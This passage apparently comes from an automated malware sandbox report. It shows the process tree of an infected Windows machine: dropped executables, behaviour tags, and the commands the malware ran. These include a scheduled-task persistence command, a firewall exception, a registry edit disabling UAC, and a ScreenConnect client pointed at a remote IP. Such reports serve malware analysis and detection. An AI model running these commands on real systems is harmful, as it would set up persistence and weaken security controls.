      "C:\Users\Admin\AppData\Local\Temp\Files\rah.exe"
      4⤵
      PID:5236
    - - C:\Users\Admin\AppData\Roaming\SubDir\SubDir.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\SubDir.exe"
        5⤵
        
        PID:3660
  - - C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"
      4⤵
      PID:2448
    - - C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"
        5⤵
        
        PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\Files\TORRENTOLD-1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\TORRENTOLD-1.exe"
      4⤵
      PID:4920
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:544
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:4896
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe"
      4⤵
      PID:372
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe"
      4⤵
      PID:4628
    - - C:\Users\Admin\AppData\Local\Temp\Files\update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\update.exe" husky
        5⤵
        
        PID:7012
  - - C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"
      4⤵
      PID:6880
  - - C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe
      "C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe"
      4⤵
      PID:7132
  - - C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe"
      4⤵
      PID:4556
    - - C:\Program Files (x86)\Google\Temp\GUME73.tmp\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Temp\GUME73.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
        5⤵
        
        PID:6412
      - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
        6⤵
        
        PID:184
      - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
        6⤵
        
        PID:4844
        
        C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        7⤵
        
        PID:6208
        
        C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        7⤵
        
        PID:6060
        
        C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        7⤵
        
        PID:4860
      - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Qjk2QzA0NkYtMkYzRi00QkIwLThDRDItRjk3MzlCREYxMjQ5fSIgdXNlcmlkPSJ7MTM0RDJFQTItNEFEQS00NjE5LTkzMkUtMUI1MDI3ODE5MkJDfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0VBNzYzQjc4LTQxMzgtNDdGMy1BRUE0LTE1NjM4Nzk3MTk0NX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iMTYiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0iezQzMEZENEQwLUI3MjktNEY2MS1BQTM0LTkxNTI2NDgxNzk5RH0iIHZlcnNpb249IjEzNC4wLjY5ODUuMCIgbmV4dHZlcnNpb249IjEuMy4zNi4zNTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxMDc4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1624
      - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{B96C046F-2F3F-4BB0-8CD2-F9739BDF1249}"
        6⤵
        
        PID:3084
  - - C:\Users\Admin\AppData\Local\Temp\Files\toolwin.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\toolwin.exe"
      4⤵
      PID:6748
  - - C:\Users\Admin\AppData\Local\Temp\Files\SharpHound.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\SharpHound.exe"
      4⤵
      PID:6868
  - - C:\Users\Admin\AppData\Local\Temp\Files\mport.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\mport.exe"
      4⤵
      PID:6300
  - - C:\Users\Admin\AppData\Local\Temp\Files\TPB-ACTIVATOR-1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\TPB-ACTIVATOR-1.exe"
      4⤵
      PID:7068
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:5668
  - - C:\Users\Admin\AppData\Local\Temp\Files\ntladlklthawd.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ntladlklthawd.exe"
      4⤵
      PID:5040
  - - C:\Users\Admin\AppData\Local\Temp\Files\access.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\access.exe"
      4⤵
      PID:6648
  - - C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe"
      4⤵
      PID:7868
  - - C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe"
      4⤵
      PID:1596
    - - C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe"
        5⤵
        
        PID:9220
    - - C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe"
        5⤵
        
        PID:9852
    - - C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\alex122121.exe"
        5⤵
        
        PID:9880
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 820
        5⤵
        Program crash
        
        PID:10048
  - - C:\Users\Admin\AppData\Local\Temp\Files\benpolatalemdar.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\benpolatalemdar.exe"
      4⤵
      PID:5912
  - - C:\Users\Admin\AppData\Local\Temp\Files\WindowsServices.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\WindowsServices.exe"
      4⤵
      PID:8864
    - - C:\Windows\WindowsServices.exe
        
        "C:\Windows\WindowsServices.exe"
        5⤵
        
        PID:8464
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:7364
  - - C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe"
      4⤵
      PID:10648
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
        5⤵
        
        PID:11604
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      4⤵
      PID:1668
  - - C:\Users\Admin\AppData\Local\Temp\Files\boot.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"
      4⤵
      PID:1048
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A04E.tmp\A04E.tmp\A04F.bat C:\Users\Admin\AppData\Local\Temp\Files\boot.exe"
        5⤵
        
        PID:11376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Synaptics\Synaptics.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:3736
- C:\ProgramData\Synaptics\Synaptics.exe
  C:\ProgramData\Synaptics\Synaptics.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:5300
- - C:\Windows\SysWOW64\._cache_Synaptics.exe
    "C:\Windows\system32\._cache_Synaptics.exe"
    3⤵
    - Downloads MZ/PE file
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\SysWOW64\Files\vncgroups.exe
      "C:\Windows\System32\Files\vncgroups.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1932
    - - C:\ProgramData\idmans\idmans.exe
        
        "C:\ProgramData\idmans\idmans.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:5240
  - - C:\Windows\SysWOW64\Files\Client-built.exe
      "C:\Windows\System32\Files\Client-built.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3352
  - - C:\Windows\SysWOW64\Files\RambledMime.exe
      "C:\Windows\System32\Files\RambledMime.exe"
      4⤵
      PID:6544
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:7108
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        6⤵
        
        PID:6352
  - - C:\Windows\SysWOW64\Files\VC_redist.x64.exe
      "C:\Windows\System32\Files\VC_redist.x64.exe"
      4⤵
      PID:4180
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"
        5⤵
        
        PID:3812
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx46_Full_setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx46_Full_setup.exe"
        5⤵
        
        PID:2216
  - - C:\Windows\SysWOW64\Files\Sync.exe
      "C:\Windows\System32\Files\Sync.exe"
      4⤵
      PID:1692
  - - C:\Windows\SysWOW64\Files\setup.exe
      "C:\Windows\System32\Files\setup.exe"
      4⤵
      PID:7776
    - - C:\Users\Admin\AppData\Local\Temp\is-JQ8HO.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JQ8HO.tmp\setup.tmp" /SL5="$405B4,25788751,180224,C:\Windows\SysWOW64\Files\setup.exe"
        5⤵
        
        PID:7712
  - - C:\Windows\SysWOW64\Files\connector1.exe
      "C:\Windows\System32\Files\connector1.exe"
      4⤵
      PID:7720
  - - C:\Windows\SysWOW64\Files\prueba.exe
      "C:\Windows\System32\Files\prueba.exe"
      4⤵
      PID:3544
  - - C:\Windows\SysWOW64\Files\update.exe
      "C:\Windows\System32\Files\update.exe"
      4⤵
      PID:1696
  - - C:\Windows\SysWOW64\Files\NOTallowedtocrypt.exe
      "C:\Windows\System32\Files\NOTallowedtocrypt.exe"
      4⤵
      PID:10856
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:8016
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        Modifies registry key
        
        PID:11804
    - - C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
        
        "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
        5⤵
        
        PID:5424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\idmans\idmans.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5080
- C:\ProgramData\idmans\idmans.exe
  C:\ProgramData\idmans\idmans.exe
  2⤵
  - Executes dropped EXE
  PID:876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\idmans\idmans.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\ProgramData\idmans\idmans.exe
  C:\ProgramData\idmans\idmans.exe
  2⤵
  - Executes dropped EXE
  PID:2008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\idmans\idmans.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:640
- C:\ProgramData\idmans\idmans.exe
  C:\ProgramData\idmans\idmans.exe
  2⤵
  - Executes dropped EXE
  PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\idmans\idmans.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5928
- C:\ProgramData\idmans\idmans.exe
  C:\ProgramData\idmans\idmans.exe
  2⤵
  - Executes dropped EXE
  PID:2924

C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=37.221.64.46&p=8041&s=d5299a0d-3d6e-49b5-a9fc-6142c65989a9&k=BgIAAACkAABSU0ExAAgAAAEAAQBtRcOmkrgNYslRocOkTkuTyihOpi8jiGU066NYR9jBDXkHxmSQ2YVUm3s8%2fooJYnEhSV7fUNG1B5eE%2bEBaTsdMjuSy6wM5sWHiNov0I%2fCi2R8idtf7h0sRNyUXYU5mv3W%2f%2bAAUF5FVSqznlNh79hYpQ5ibv2AEsvG1v7zIzpVIe9GJKEaCyiMYnNwSkNrJyk7EHRdZqqtnkfYNP7V5qS%2f5EGwD4G1QOOnZh31YJbjAYbQ8GP%2b16XpkKKcCdOuQgGXJcCyDfk7uTR3jzS8ZKuveOcMCrYggcWYA0u%2bjDf3hxmbOoHDVTNrhlpt3R6xZaEcGEohbZJ69mglDgpaukS6e&r=&i=18%2f04%2fG%2ftwo" "1"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1360
- C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe" "RunRole" "3363a67d-c0fe-45e9-a981-bf597a21aabf" "User"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: AddClipboardFormatListener
  PID:5012
- C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe" "RunRole" "3fdf166e-8b9c-4188-bfdc-ab1838fd35d6" "System"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: AddClipboardFormatListener
  PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5008
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5528
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5272
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5696
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1428
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5172
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5140
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:424
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5572
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6088
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3264
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:408
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5444
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1052
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:4504
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4584
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  PID:6020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1584
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5928
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1412

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
PID:2656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4240
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5796
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1040
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3396
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6576
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6584
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6956
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6964
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6448
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1740
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6660
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6672
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6996
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6944
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1120
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5864
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1056
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1152
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6700

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:6848
